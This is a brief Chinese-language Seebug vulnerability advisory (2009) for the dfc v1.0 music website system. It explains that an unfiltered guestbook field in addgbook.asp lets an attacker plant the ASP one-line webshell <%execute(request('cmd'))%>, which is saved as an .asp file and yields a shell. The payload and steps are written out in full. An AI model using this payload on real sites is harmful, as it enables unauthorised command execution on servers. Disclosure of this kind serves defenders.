段富超(dfc)v1.0音乐娱乐网addgbook.asp远程写入webshell漏洞

2009-08-09T00:00:00
ID SSV:12017
Type seebug
Reporter Root
Modified 2009-08-09T00:00:00

Description

段富超(dfc)v1.0音乐娱乐网是集flash动画,文章系统,网络视频,留言本、在线点歌、情感测试等功能于一体(视频栏目可以直接调用优酷土豆等视频网站视频),非常适用于flash动画作者爱好者,以及视频短片作者爱好者的个人网站。

留言处没严格过滤可直接向数据库插马 dfc1.0/addgbook.asp

在留言“你的主页”写入一句话代码,<%execute(request("cmd"))%>,留言信息会写进date/dfc.asp

连接即可获得shell http://127.0.0.1/dfc1.0/date/dfc.asp

dfc v1.0 暂无

建议用户进行严格过滤